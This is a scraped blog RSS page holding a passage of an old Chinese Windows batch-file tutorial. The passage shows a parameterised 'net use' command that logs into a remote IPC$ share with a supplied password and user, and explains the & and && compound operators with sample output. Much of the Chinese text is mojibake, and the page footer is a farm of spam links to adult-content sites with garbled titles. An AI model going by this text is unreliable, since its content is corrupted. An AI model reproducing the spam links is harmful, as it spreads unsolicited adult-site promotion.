@net use \\1%\ipc$ "2%" /u:"3%" 注意哦，�q�里PASSWORD是第二个参数�?
@if errorlevel 1 echo connection failed 
怎么�?使用参数�q�是比较���单的吧？你这么帅一定学会了^_^.No.3 
�?如何使用�l�合命��o(Compound Command) 

1.& 

Usage�Q�第一条命�?& �W�二条命�?[& �W�三条命�?..] 

用这�U�方法可以同时执行多条命令，而不���命令是否执行成�?

Sample�Q?
C:\>dir z: & dir c:\Ex4rch 
The system cannot find the path specified. 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:51 <DIR> . 
2002-05-14 23:51 <DIR> .. 
2002-05-14 23:51 14 sometips.gif 

2.&& 

Usage�Q�第一条命�?&& �W�二条命�?[&& �W�三条命�?..] 

用这�U�方法可以同时执行多条命令，当碰到执行出错的命��o后将不执行后面的命��o�Q�如果一直没有出错则一直执行完所有命令； 

Sample�Q?
C:\>dir z: && dir c:\Ex4rch 
The system cannot find the path specified. 

C:\>dir c:\Ex4rch && dir z: 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:55 <DIR> . 
2002-05-14 23:55 &

<img src ="http://m.tkk7.com/zgghc/aggbug/55686.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.tkk7.com/zgghc/" target="_blank">牧月�?/a> 2006-06-29 10:24 <a href="http://m.tkk7.com/zgghc/articles/55686.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>                                                                                                                                                                                                                                                                                                               <footer>
<div class="friendship-link">
<p>��л���������ǵ���վ�������ܻ���������Դ����Ȥ��</p>
<a href="http://m.tkk7.com/" title="&#20122;&#27954;&#97;&#118;&#25104;&#20154;&#29255;&#22312;&#32447;&#35266;&#30475;">&#20122;&#27954;&#97;&#118;&#25104;&#20154;&#29255;&#22312;&#32447;&#35266;&#30475;</a>

<div class="friend-links">


</div>
</div>

</footer>

��վ֩���ģ�壺
<a href="http://aiqingdao999.com" target="_blank">���޹�����Ʒ�������߹ۿ�</a>|
<a href="http://www-7479.com" target="_blank">����������߹ۿ�</a>|
<a href="http://1314con.com" target="_blank">���޹���Ů��aaaëƬ����</a>|
<a href="http://chenglide.com" target="_blank">һ����a�����Ƶ�ۿ���վ</a>|
<a href="http://5c7m.com" target="_blank">�����ۺϽ������޺ݺ�����</a>|
<a href="http://www04ggg.com" target="_blank">��������A��ëƬ��ѿ�</a>|
<a href="http://jyzs888.com" target="_blank">����ٸ�a��ëƬ�˳���</a>|
<a href="http://323799.com" target="_blank">��˾����ҹ������Ѹ���
</a>|
<a href="http://kj555888.com" target="_blank">222www���߹ۿ����</a>|
<a href="http://jinmenonline.com" target="_blank">����av����������ַ</a>|
<a href="http://aqdav22.com" target="_blank">91��Ʒ������Ѿþù����鶹</a>|
<a href="http://yeyaweiban.com" target="_blank">�þþþþ�a����ŷ��AV</a>|
<a href="http://199291.com" target="_blank">�þò����þü������Ƶ7
</a>|
<a href="http://3589006.com" target="_blank">�þþ�Ʒ������Ƶ</a>|
<a href="http://chaoxung.com" target="_blank">���������Ļ��ȫ������Ļ���</a>|
<a href="http://dasheng178.com" target="_blank">�þþ�Ʒ��������AV������</a>|
<a href="http://hmjx-tape.com" target="_blank">���������Ƶ��վwww</a>|
<a href="http://xtolm.com" target="_blank">����ŷ���պ�һ��������������</a>|
<a href="http://t66p.com" target="_blank">������Ʒ���_�����������ۿ�</a>|
<a href="http://xbooktxt.com" target="_blank">ɫ͵͵������������</a>|
<a href="http://as5566.com" target="_blank">������Ļר����������</a>|
<a href="http://139699.com" target="_blank">�ձ�������Ļ��Ѹ�����Ƶ</a>|
<a href="http://simupiao.com" target="_blank">���޳���������ѹۿ�</a>|
<a href="http://181xx.com" target="_blank">���������߹ۿ���Ѳ���</a>|
<a href="http://caocl1024liu.com" target="_blank">�þþþþ�����av������ѿ</a>|
<a href="http://k4h3.com" target="_blank">���޵�һ����ӰԺ</a>|
<a href="http://www-yhty.com" target="_blank">һ��Ů��18ëƬ���</a>|
<a href="http://jgxsdst.com" target="_blank">һ��ɫ���þ��ۺ����޾�Ʒ������</a>|
<a href="http://hnmxld.com" target="_blank">�պ������Ƶһ��</a>|
<a href="http://hmjx-tape.com" target="_blank">һ����a���ɫëƬ���</a>|
<a href="http://h588888.com" target="_blank">���޾�Ʒ��Ƶ��ѿ�</a>|
<a href="http://xamxx.com" target="_blank">������Ʒ����С˵ר��</a>|
<a href="http://wwwkckc.com" target="_blank">����ɫ������Ļ����AV</a>|
<a href="http://aijiu868.com" target="_blank">��ѹۿ���ɫ��Ƶ��վ(��ɫ)</a>|
<a href="http://yxjcgs.com" target="_blank">��ѿ����av����һ����������</a>|
<a href="http://www3ratcom.com" target="_blank">�þþþ����޾�Ʒ������ַ</a>|
<a href="http://xxxxnii.com" target="_blank">�������˾�Ʒ�����Ƶ��</a>|
<a href="http://xiaomaomi8.com" target="_blank">Ի�������Ƶ�������߿�Ƭ��</a>|
<a href="http://imfever.com" target="_blank">���޸���XXXX��ɫ��</a>|
<a href="http://rimcn.com" target="_blank">�ձ�������Ѳ�����Ƶ</a>|
<a href="http://w7759.com" target="_blank">��Ѹ��������Ƶ</a>|
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>